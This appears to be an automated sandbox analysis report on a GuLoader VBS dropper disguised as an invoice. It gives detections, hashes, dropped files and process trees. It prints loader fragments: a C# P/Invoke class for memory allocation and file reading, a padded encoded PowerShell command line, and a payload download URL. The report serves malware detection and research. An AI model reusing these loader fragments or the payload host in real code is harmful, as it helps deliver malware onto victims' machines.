    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information
    NTDS21
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
    Scripting
    LSA Secrets1
    Application Window Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync12
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 623396 Sample: WWVN_INVOICE_8363567453.vbs Startdate: 10/05/2022 Architecture: WINDOWS Score: 84 22 Found malware configuration 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Yara detected GuLoader 2->26 28 2 other signatures 2->28 8 wscript.exe 2 2->8         started        process3 signatures4 30 Wscript starts Powershell (via cmd or directly) 8->30 32 Very long command line found 8->32 34 Encrypted powershell cmdline option found 8->34 11 powershell.exe 22 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\nmk1nqgs.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    WWVN_INVOICE_8363567453.vbs24%ReversingLabsScript.Trojan.Valyria
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://go.micro0%URL Reputationsafe
    http://barsam.com.au/bin_FCWtLoO90.bin0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://barsam.com.au/bin_FCWtLoO90.bintrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.756793102.0000000004FF1000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://go.micropowershell.exe, 00000010.00000002.757728131.000000000525D000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      No contacted IP infos
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:623396
      Start date and time: 10/05/202214:02:152022-05-10 14:02:15 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 49s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:WWVN_INVOICE_8363567453.vbs
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:30
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.evad.winVBS@8/9@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 97%
      • Number of executed functions: 22
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for JS files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      14:05:13API Interceptor29x Sleep call for process: powershell.exe modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Windows\System32\wscript.exe
      File Type:data
      Category:dropped
      Size (bytes):58767
      Entropy (8bit):7.381111578760272
      Encrypted:false
      SSDEEP:768:kxehGKqGiOPsqHEA4l7UTJXGJOVFmP2c/7aD+PJL/k2N2788T8NhBrs:kxlK/iOPsmV7J2JCFDZyP1/krQPNfo
      MD5:7F53C5BDB8BE10B4244A89D5B4580B53
      SHA1:A2A3BF3829D0311E3BCC981D98B7FEE88B830055
      SHA-256:13ACE3214FB2EB0AA56526DBEE9510E1ED2B1F1D051D9FAB5FDC7D01DFE964F5
      SHA-512:72FE63679C4522FC5B55D6B593FEDFC0A4025DE6573AF154D86E74352260966B4F2F1C7A389372C04E1846C800BA9A3029D466E72C9BB70E963140C8AA9B287F
      Malicious:false
      Reputation:low
      Preview:......h:....4$.....4$yY.,Z.._1..4.5|..@@@@9.u.W.........5Yy.Zf.^.`.O;.C.+...0.),........c@......l ...^.>...QG7....N...[...ZRjx....v..x_.=..J.n.....T.jcli..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....M..../dX.).I..uE_ba.uyB/....Q.R....e..c.f...i/.._8~.8....[.I.".5.G...`X.T.1&...V...~...(d..h+.3.A..Ri#.j.c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....hS.B...P.IX.....k.......n.~.....p.64...I@.0..5|..5EX....:.|..5...p8.V..~.qDoo........q.......=...uEy....]..h..|.....14|....[.O..i..:v...ur.d[...E.a.g..14|.o;...9.......=.|'ik.|......1.=d..~.5.5..O5|....;Y5|.]m.A.....5.C......}.._}.i~2.|...X.5..=.5.~...=....._......!......L.....O.&.5...4|.<......s..MI.ir.L.j z.i..2@rg.O 6......:.....5|MF.....i.|.K.H*.@SO.1.?...i...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..M^.5.t..xH/.....Z..(K.../|$
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
      Category:dropped
      Size (bytes):1328
      Entropy (8bit):3.9598900643026487
      Encrypted:false
      SSDEEP:24:H5e9EuZfLtleXDfHfhKEbsmfII+ycuZhNb6akSqLPNnq9qd:wBLt0zZKPmg1ulGa3Sq9K
      MD5:0D8D76FA667A3F8B0687A9F384D756B0
      SHA1:8614EC251CE01FB0A370C2EDCA5E634916860355
      SHA-256:2F076029190E1914DB9F290A1DA8A2FA2BCD62752D2E8EB675889B05806CD0D7
      SHA-512:2810D16E67FCA487BBFED7397786E921AEF95FBD7E670111B87F6A88F3EFA35AF2B7F0D29311C5197B8594A87357687F568EF9B7B11B244F2A7458A3B5D5F21F
      Malicious:false
      Reputation:low
      Preview:L....Uzb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP................4_\e.%.g:4.}.:}...........4.......C:\Users\user\AppData\Local\Temp\RESD70A.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.m.k.1.n.q.g.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.0982348855913746
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBxYak7YnqqqxNPN5Dlq5J:+RI+ycuZhNb6akSqLPNnqX
      MD5:345F5C65922506673A34037D153A7DA4
      SHA1:7AB5F7D82265424CAEDF5A4A7BAC99D00B6FDA38
      SHA-256:C728C7B4C4B4C02444860EF38AA7DBDEC755C6D2BAC10CA2B60F4E4029A628E8
      SHA-512:D84EA6D7D410392CA16FE2676A96B06192AB75CC7C3553E6734E769E67E6523D6D2EB7FFEC84CC82647E63ABBC109FB15CE8124DB190DD13E07F3562E987F1C5
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.m.k.1.n.q.g.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.m.k.1.n.q.g.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):882
      Entropy (8bit):5.226399550729973
      Encrypted:false
      SSDEEP:24:Jo1SGv76URmgkr7nv76zLu+yNp2vHNKgs2qz6LgdaD:Jo1SGz6emhr7nz6zjyqVFUu
      MD5:EA505B82FAD07E00D99FD3C7A36FF79A
      SHA1:68B8F59916AFB004F83158D741B1C75E02F2E83B
      SHA-256:AC0F5F6D3627B4F5F33695E43875609817401A6BF61B88B7193600FCC07AD50A
      SHA-512:BF5CA9FF4B2B5F95A04901F20869E1AB2119A0A569CFF032E8048260A11FE7E87DCB9112A2E20632A830D95353D2CB810DC1571B0091D828FFFBB61DBDE6F0DD
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class chondroga1..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int chondroga6,ref Int32 Clathra4,int Varedekla,ref Int32 chondroga,int Outhowling5,int chondroga7);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Varedekla0,uint Varedekla1,IntPtr Varedekla2,ref Int32 Varedekla3,int Varedekla4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Varedekla5,int Varedekla6);....}
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):369
      Entropy (8bit):5.257235356734923
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fTT3H0zxs7+AEszIwkn23fTTDFH:p37Lvkmb6KRfL4WZEifLPFH
      MD5:CF8F3B8A426D47F4EBA71947E3CC3904
      SHA1:08FA86AB97DC7A7432C203B73D2817E266540108
      SHA-256:7F74A53C1BB6DD79654B06C9332F2B1C1015704AF74127C2CE8BCC3FA9A2139E
      SHA-512:8D3B3A3919FC8E02CE1E38CA4C271F1DED80E435F24368AFDDEB4B5E5A74B2AF0A4E63BB453DDFC35C688C13F3E68A8E0AB9AA6135017938A159170D73303A97
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.273098787476541
      Encrypted:false
      SSDEEP:48:6CPW4BCJTLrL9CzjGOK4j5SuJw398O1ulGa3Sq:nW3J/H9fCSViYK
      MD5:1058A8205AC63E740D8DCB2C632B3310
      SHA1:6E2D1A45BD2621E63D954ED1BF2E257EDC921CCF
      SHA-256:60BD4F36DE269F0677599366AF5B4A74A063BB6A15889A71D41787CA5E55648D
      SHA-512:5BE94D261417F861A0895C15196B9B2E799A778003C722A3177FB460902BD8C54CCECEC015ADE270312F9071553360B96E2F60B5432DF5F90192D5DDBA88520C
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Uzb...........!.................%... ...@....... ....................................@.................................l%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~..l...(...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................2.+.................|.....|.......................................... 9............ D............ I............ a.!.......... f.+.......r.....z................................ ..r.....z...............................
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):867
      Entropy (8bit):5.322818868845021
      Encrypted:false
      SSDEEP:24:KJBqd3ka6KRfLJEifLP4KaM5DqBVKVrdFAMBJTH:Cika6CLJEuLQKxDcVKdBJj
      MD5:3A2D7F6891BF83D9E3C331E3989D5203
      SHA1:45F3F9385D677B2B557FF75006156368CBCE87DD
      SHA-256:C0B0DC29080260EE261192AD094675D1448619BD81A23C44877247DB46826682
      SHA-512:264BFD73DD759D0539D49FED709349F4AFF0DCB511BC9857E6F8A2A5215AD24EB14571B34ED57DE5A09D64F7DAFC3A4A2CE1BD0C19631C13CD0DE174138EE5C9
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      File type:ASCII text, with very long lines, with CRLF line terminators
      Entropy (8bit):4.783519118829289
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:WWVN_INVOICE_8363567453.vbs
      File size:233243
      MD5:9f8e253fd51c33a2f874942ebc0d3795
      SHA1:6868a9005489e56542cf0df063985132fef50f3d
      SHA256:c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
      SHA512:eb61932008b275fde416e7e9df71b0efaec9feeb1a33af8b98d6c582fad3a9bc91cfd4450589d3fb0a7cb6601d967c8ffa5f6d023cbbf167f2eb1ac35b054b8c
      SSDEEP:3072:pzLcTyRQ+PUQSsYwqV0SuKiSMq+fxS9XZgrrfIhAvL18lALuDYx7Pu2nNQ:pzPRQ+Qp3ZCtG2+
      TLSH:C434FBC0521D19EA8298D58CBCD432AA0F5798DDFA07F96E93A05F6F1390023BD8DD5B
      File Content Preview:'IRIDI LLAN bedgownd Misdem rvful Huntsville chor LANDSFO Aftere Klito4 Agterin LEON stavep TROER corrective ADIPS form ..'Salonrifel9 till monorimeek Ungef7 unikae FJERNKONT NYTAARSTAL Monoxylone telfonm EVECKMI pligtigts GRIDDLEB flgeska KILLBUCK Fascio
      Icon Hash:e8d69ece869a9ec4
      No network behavior found

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:14:03:15
      Start date:10/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
      Imagebase:0x7ff7fcbf0000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:16
      Start time:14:04:49
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# N a n d i n m e 5   B o b l e k a   A r t i k u l e r   h o t m   F o r m n i n 4   V i g e s i m o k i 6   s t o m   E c h i n i t 6   p r o n a t i v   P y r o   T e x t t v 7   E l e v a t o r f r   R A M R O D S A   Q e k u r s u s s   b e a n p o   S k r k 2   p o l a r i   m e d e o l a   L o r a   R a p h i 6    
 # d e f a   p i e d   T a n d k d s b e   U n i m m o r   B a d g e r b 6   e x c l u s   C h o n d r o g 8   A E R O L O   F I S H E R M A N I   F A G I N T E G R   I n c e p t o 3   S n u r l 6   B i s e x u a   d o s s e r   g a v e l   m e t a f o r e   t r a n   a t a k   S e i s m i 2   N o n f a b u l   D i g t e k 3   R E G N S K A   P h y t o m e 9   M u r a e   H a l v 8   V O C I F E R A T E   W O O D C R A F T   h a r d h e a r t   K n i b   s e j t    
 # I m m e r v k 8   S p r o g f l   R E D S H I   s i f f l e u s   S u p e r   r i f t e r s   G r o u c h   P r o e v e t i   P R O T E N S I   L y d b i l l e d e   S U B E L E C T R   R a m m e t c h o r   C I S S E S A R   B r e d   j o r d f s t e   A n t i s e n s   L O X O    
 # S p l u r g y p y 7   S e p t e n   D i m s   T e b r e v s u n c 2   S t t t e p 2   l i k v i d e   A f t v i   p a n t o g   v e j b y g   c o c o   I S B R Y   P A S S   P i n f   m u n i k a t   u n s e   G U L D R   M e l o d i o u   p a n i m e t e   R a f t e s o s t e   a v a n c e m e n t   E n t e a s u b p r   M Y C E   T i d l n n e d e 3   o d y s s e n   d r y p t r r e n   p e r s o    
 # h o r n   C e n t r 4   H e n r y k k e s l 8   F O R D A M P N I N   I n t r a f o l   C a l d r o n   i n f r   v a l g   S I S Y R I   G e n o a k o   s k a d e g r e r   U n d e r a f s n i 2   V a c c i n a t   d r i l l e r i e r   C H A I    
 # D e t o x i f   a f m a l i   H m m e t n   A l k o h o l t y p 9   l i n i e   T A A R N   m e r o   S p e c t r o 8   s t j e r n   P o s i t i o   A u t o b i o   u t a k n e   H u m a n h o o 3   o m p l   B e v i s f r e l s 3   B r i l l e f o d e 6   E J E N D O M S   T u r i s t k 4   c h a n t a n t   b o n d e s t a   B I L F R A G T E R   S I D H E P R E    
 # S k i d e n t   a a n d e r f i a u   T a l l w o o 5   v i n o l o g i s t   L O Y A L E   V a l e r i 4   l a v i n   B a a r 9   f o r v e n t e l   N o n c o n v    
 # P E R S O N N A V   i d e m p   s t a r t   c h o y a i n t i   l o x i c t   H e s t e b r e 1   F o e l e b a l   M o i s   L a l l e t   O b e l i s k 3   d r i k k   L a n a s r    
 # b e s t r a a l i n   S T R M P E H   V E D L   M y e l o   D i s h   A c c e p t 1   U n p l 3   A R B E J D S L S H   A n m e l d e l s e   S K O V H Y T T E   p r s t e s k a b   P u b l i c i s 8   U m i n d e l 4    
 # s p o r t s m a   D k n i n g s s 4   D e p o s i 1   r e g n i n g s f u   s u s p e   D e b a   r e q u i r   S a l t s t e n m 1   R D E P A N G I    
 # S e l v m o d s i g   S U B D   k v k s f i n g e   A n o m   t h a i l n d e   O n d u   n o n p   W I N D B   a t o m v a a b n e   C h i e   s u b c h o r o i   S T U P H E F O K   I m b r u e m   E r n r i n g s f y   D r o o p s b 1   p r a i s e f u l n   I N G E N   O v e r   H o d s   O v e r h a u l e 8   w o o d s   u r e t h r o   L o k a l k    
 # R U N G L E S S K   V e r d   c y c l o d   a f d k n i n g   b u s l   A t t u n i n g   S a n i t i s i   P h o t o s   B o r e p l a t f   M a j o r   J U M B L E   W H E E L I N   L e e p i t d r 6   U N U S E D   M A G N   A g r a f 1   A m b e r n 4   A n d e n k l a 8   J a g g e d n   s o l i d a t i n g   A n g i v e   B R E V V   M I S T A N K E R    
 # P a l e i c h t h y 6   C l o w n e r i   t r i v s e l s p   P a m e 6   T i g h t w i   U n w i l 8   P e r i 4   P r o d u k   D a g c e n t r   G R A N U L A   S j u s s e n s r o 5   I S C H I A C B E   L e e f 7    
 # T r e m o u r i n t 5   S J U S K E M A L   D j e l l   M i l i t r l 9   G l o s s a n   R E V I E W S D   R E E L P E D A N T   H u s h o l d e   A L I E N A   D o b b e l t f u n   T e a t   H i n d e r e   S k y d 7   m y g g e s   L y n l a a s h   P a a t r   F a b r i k s 9    
 # P A A T E G N E R   D e t a l j e r e r   t i g g e r s k e   F i l e s   r e t s o p g r   P L U R   J u g e n d m n s t   U d b u 5   H e a v y h   m i l i   m e l o d   a f l a d n i n    
 # a f t v   a a n d e v e   b r o d y a g a s   t e l e o c e r a s   O C T A V O K   Z a r z u 3   I N D S   T W I S C   S K O V S L O   T o w n l a n d l y    
 # P R I S   G r u s v e j e 9   U n m a r b l e i z   A L K O H O L   D E V I A T I O N   H o m a t o   C r e a t i   S t o b s b 7   a n f l j e n   F o r e t a g e n   P r o t   U P L E A P E D   d i m p l e m e   g e r t h a s h a   S T O R K E N B B    
 # A s s u r a b l   M e t a f o r e r n   I H U K O M P   X y l o c 8   S t a n d a r   H a n d l i n g s l   P e w f u l b l o 2   M i s t n 3   O Y S T E R   D e t a i l p r   r e f o r   R I G S R E V I   c l o f i b   K N I C   B r n e l o k k   D e m o n t e r 8   t a r v   s l g e r s t   U N D E R    
 # S a n s e v e 9   I r r e s p   B I R C H E   M e g a   D a g l n s s a 2   K Y S T   S t o m a t o l o   A t t y   r u t i n e s s   p i c a m a r   l a c c i c h e   B Y G G E M Y N   g r i m a s   i n t r u   m a r q   j a r d o n n   c h o l o s   M O R B I   S A V A G E S S   R I D E H E S T E S   S t e m m e r e t s 5   r e v i   B a s t i l l 8   B e d a   S C U R R I E   U M E D G R   K y l i n   u n f i   s l i p   P R E H E N S    
 # A n d e n k l a s s   d e m a   S C I L L A E R   b l r e h a   R o n i n g 8   C U E M A N S H I   K a s e r n   R u f g a r d i n   p r a n g e n   U S P E C I F I   S u b l i m   K E R N E O P   A r i d   b r n e f d    
 # K a f f e g   B o o n d o g g l e   N o s t   R i f l e t t o r 7   S U R G E L E S S   I d r t s h j s k 2   r e s e r v a t i o   k i s s e   g a y l u s s i t   a t o m a f f a l d   R A G E O U S   B u t i k s d r i   o p d a t e   H o r n b r i 4   C o n s a n 7   M L K E K   I o d i d p h i l 6   I d e a l i s m e 4   F l a g e   I n v o l v e r s 4   u l n a a n i   R k e n u n   l i m e l i   a a r r i   m a d d o x u d v   H e l h e s t e n a   P o s t u l e r 1   B e z e l s c   B l i n    
 # C a s t e r 6   v a n d   c h a e n o   S q u a t t 5   H I G H L   C o n c h a e   P a r t   D E K L   s u b s i d e   u n d e   f a u n e r a   s p r e a   P A C I F I C A   F J E N D T L I   c e p h a l o t h o   S E R R A T I O   S e r b i s k e l 8    
 # F L L E S A N   A r a g o r n u n a   e n s r e t t e d e   M y e l   s u p e r s e x e   A g g r a v e r e   t i m e l o f   s i m e o n b e v i   P R E O P E N I N   s m e l t e   j e l l y f i s h a   G e r r a   P o i t r a i l o    
 # X e n o g l o s   O u t n   r e v i s o r f   V A A B E N F A   R u m s k i b e r 1   A t t e s t e 9   H a a n d h v e l s 8   D I P L O M   S I L E N A L   O a k y s l j d 4   L a t e n s   m f g g r u n   k a r t o t e k s o    
 # e s t o   T a l m   T u a r e g 2   B l o k f u n k t i 1   F o r l a   T r a n 1   A r b e j d   N o n c o   s i g t e m e l s o   G a l v a n i   F o d e r f a   R e s e c t 5    
 # E t a p e l b e t   B a c k f i s c 8   M Y L D R E   M a l c 8   g a m m i c k u   E g m u n t v a   H K A S   U n i r o n i c 5   T i l b a g e s k   F I R E O G T Y V   S t e a d i e s t   R g t e n d e s 4   S k v a d r o n e   B r e i s l a k i    
 # V I R K S O M H   G u e r 8   M A N C H E   A c c o m m o d a t   S e m i v e r t i 7   N A I V   L o g o g   S P I D S G   g k a n t l   t u g r i k s p r   c h a m   S y s t e m b e 5   B R O N Z E F    
 # R u m p l e l a s   D A N S E M U S E   M E S O R R H   U N D I S C O V E   T i d t a g e r e r   T y p o s s t o 7   B R O K A D E R S R   M y o s o t   r i d i c u l o u   B u g t   s l a n t e   j o l l i e d a n t   O M D I R I G E R   D e t r o n i s   F a d d 3   D r i k k   K R A G E F U G   P S E U D O A M A   S Y D D   U N D E T R I M E   t a m l u n g s u   l e o n a r d o u   O p l r   g e m i n a t   F r u g t h 5   M E T A   V A N D L B   U N T H O   m i s r e f e r r e   K h a l 6   S u k r i n g e   v g t i g    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   c h o n d r o g a 1  
 {  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m F o n t s A ( s t r i n g   R u c t i o u , u i n t   M u s k i l y 7 , i n t   D e b i 7 , i n t   c h o n d r o g a 0 , i n t   F a r m a k , i n t   Q u i n q u e v e , i n t   S L G T ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " C r e a t e F i l e A " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i a c ( [ M a r s h a l A s ( U n m a n a g e d T y p e . L P S t r ) ] s t r i n g   R u c t i o u , u i n t   M u s k i l y 7 , i n t   D e b i 7 , i n t   c h o n d r o g a 0 , i n t   F a r m a k , i n t   Q u i n q u e v e , i n t   S L G T ) ;  
